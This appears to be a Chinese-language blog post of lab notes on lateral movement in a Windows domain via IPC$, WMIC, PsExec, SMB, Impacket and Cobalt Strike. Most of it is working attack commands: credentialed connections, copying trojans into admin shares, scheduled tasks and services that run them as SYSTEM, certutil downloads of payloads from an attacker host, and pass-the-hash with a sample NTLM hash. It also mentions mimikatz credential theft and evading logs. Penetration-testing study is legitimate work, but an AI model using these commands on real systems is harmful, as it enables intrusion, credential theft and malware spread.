流程:

进入域主机=> A 192.168.43.xx 192.168.3.xx =>提权

常规信息类(应用&服务&权限) => systeminfo ipconfig /all net time /domain

架构信息类(网络&用户&域控) => net user /domain net localgroup administrators

关键信息类(密码&凭证&口令) => win->mimikatz linux->mimipenguin

扫描端口内容=>需高权限 proxychain+nmap

工具: adfind,bloodhound,cs插件

IPC 139 445 WMIC 135 psTool 445 SMB 445

补:

-内网穿透:解决网络控制上线&网络通讯问题

SPP&NPS&FRP&Ngrok集合

-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)

ICMP DNS域名解析 ssh smb

-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

proxifier sockscap proxy chains(linux)

总结:

IPC 通信机制 启用文件和打印机共享 不同进程或不同计算机之间进行通信和数据交换 139 445

MIC PC机制 用于不同进程之间的通信 135

PSTOOL SMB服务 445

SMB 一种网络通信协议 445

基础信息获取

判断域控 shell net time /domain

定位域控  shell ping god.org

域控成员信息	net user /domain

扫描端口内容=>需高权限 proxychain+nmap
获取密码=>hash

攻击机运行=>需要代理

上传文件到跳转机->运行

IPC 139 445

WMIC 135

psTool 445

SMB 445

系统自带

impacket套件

IPC

是什么?
IPC是专用管道,可以实现对远程计算机的访问,
IPC(Inter-Process Communication):IPC是一种在操作系统或网络环境巾,用于不同进程或不同计算机之间进行通信和数据交换的机制。攻击者可以利用IPC通信机制,在内网中的不同主机之间传递恶意代码或执行命令,从而在目标网络中实现横向移动。

服务如何开?
控制面板--网络和共享中心--配置高级共享设置--启用文件和打印机共享--到指定目录下去设置共享权限

如何用服务实现移动?
需要使用目标系统用户的账号密码,使用139、445端口。
1,建立IPC链接到目标主机
2,拷贝要执行的命令脚本到目标主机
3.查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
4.删除IPC链接

常用命令

net use查看
net use \\ip\ipc$"password" /user:username #工作组
net use \\ip\ipcs "password"/user:domain\username #域内 
例如 net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\dbadmin
net view ip		查看文件共享
dir \\ip\\C$\

shell net use  * /delete /yes	#删除连接
手工 
连接测试

木马上线准备

传输木马/运行上线
拷贝木马文件到目标机器 需要高权限
copy  1.exe \\192.168.3.32\C$\
copy  sql.exe \\192.168.3.32\C$\

利用at命令上线(低版本 windows低于2012)
#添加计划任务运行指定程序
at \\<指定IP><指定时间>c:\木马
at \\192.168.3.31 1:45 c:\sql.exe

利用schtasks命令上线(低版本 windows低于2012)
其中192.168.3.32为目标ip	Administrator为目标用户名	Admin12345为目标密码	beacona为计划任务名	c:\sql.exe为计划任务执行程序路径

#创建beacon任务对应执行文件
schtasks /create /s 192.168.3.32 /u Administrator /p "Admin12345" /ru "SYSTEM" /tn beacona /sc DAILY /tr c:\sql.exe /F 
#运行beacon任务 
shell schtasks /run /s 192.168.3.32 /u Administrator /p "Admin12345" /tn beacona /i
#删除beacon任务
schtasks /delete /s 192.168.3.32 /u Administrator /p "Admin12345" /tn beacona /f

正向连接=>同上 (上传木马到跳板机=>复制到靶机=>at命令执行木马=>connect ip port)

插件LSTARS

用法与手工同样cs

Impacket(atexec)
该工具是一个半交互的工具,适用于Webshell下,Socks代理下;
在渗透利用中可以收集用户名、明文密码、密码hash、远程主机等做成字典,批量测试

py版

python3 -m pip install impacket
密码连接
python atexec.py <用户名有域名需填域名>:<密码>@<IP>"<要执行的命令>"
python atexec.py god.org/administrator:Admin12345@192.168.3.32 "whoami"

hash连接
python atexec.py -hash:<hash值> ./administrator@192.168.3.21 "whoami"

exe版本

将atexec.exe文件上传到跳板机
shell atexec.exe /administrator:Admin12345@192.168.3.21 "whoami"

上线*

上传木马到网页=>下载木马=>执行木马

https://forum.ywhack.com/bountytips.php?download

1.上传木马文件aa.exe到靶机网页	C:\inetpub\wwwroot

2.将上方whoami替换为以下	=>下载木马	C:\Windows\System32
certutil.exe -urlcache -split -f http://192.168.3.31:80/aa.exe bb.exe

3.执行木马	whoami直接替换为bb.exe

MIC

MIC(Microsoft Windows Inter-Process Communication):MIC是Microsoft windows操作系统中的一种PC机制,用于不同进程之间的通信。攻击者可以通过利用MIC漏洞或弱点,将恶意代码注入到其他进程中,并在内网中传播和横向移动。
wmic(单执行无回显) 
WMIC是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,
并且该方法不会在目标日志系统留下痕迹。
下载:
wmic /node:192.168.3.32 /user:administrator /password:Admin12345 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/sql.exe c:/mic.exe"
运行:
wmic /node:192.168.3.32 /user:administrator /password:Admin12345 process call create "cmd.exe /c c:/mic.exe"
cscript(修复无回显)

这个无法在CS里面去用。因为回显的靶机cd窗口等待你的命令传输时。CS会卡死

需要能与跳板机桌面交互=>wmiexec.vbs 

cscript //nologo c:/wmiexec.vbs /shell 192.168.3.32 administrator Admin12345
Impacket(wmiexec)

cs无法运行?=>攻击机使用proxifier代理 使用

wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"

下载木马
wmiexec ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.3.31/sql.exe c:/113.exe"

运行木马
wmiexec ./administrator:admin!@#45@192.168.3.32 "cmd.exe  /c c:/113.exe"

psTool

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。

PSTOOL(Sysinternals PsTools):PSTOOL是一套由sysinternals开发的windows系统管理工具集合,其中包括多个命令行实用程序。这些工具提供了许多功能,包括远程执行命令、进程管理和文件传输等。攻击者可以使用PSTO0L来在内网中执行命令、控制远程主机和传输恶意文件,以实现横向移动和攻击。
psTool(win官方自带)
无法代理=>需要管理员权限以及桌面交互
psexec64 \\192.168.3.32\ -u administrator -p admin!@#45 -s cmd
套件Impacket(psexec)

有回显,可hash,可以代理

后可直接接命令 ""
明文
psexec ./administrator:admin!@#45@192.168.3.32
hash
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
cs插件(psexec)
目标列表=>需要上线的主机=>横向移动(psexec)=>监听器为跳板监听器|会话选择跳板ip system

SMB

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。

SMB(Server Message B1ock):SMB是一种网络通信协议,用于在计算机网络中共享文件、打印机和其他资源。攻击者可以通过利用SMB协议的弱点,执行远程命令和文件共享,从而在内网中移动和传播恶意软件。
services内置利用:(单执行)
1.创建服务
services -hashes 518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 create name shell -display shellexec -path C:\windows\System32\shel1.exe
2,启动服务
services -hashes 518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32 start name shell
impacket(smbexec)
smbexec ./administrator:admin!@#45@192.168.3.32

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注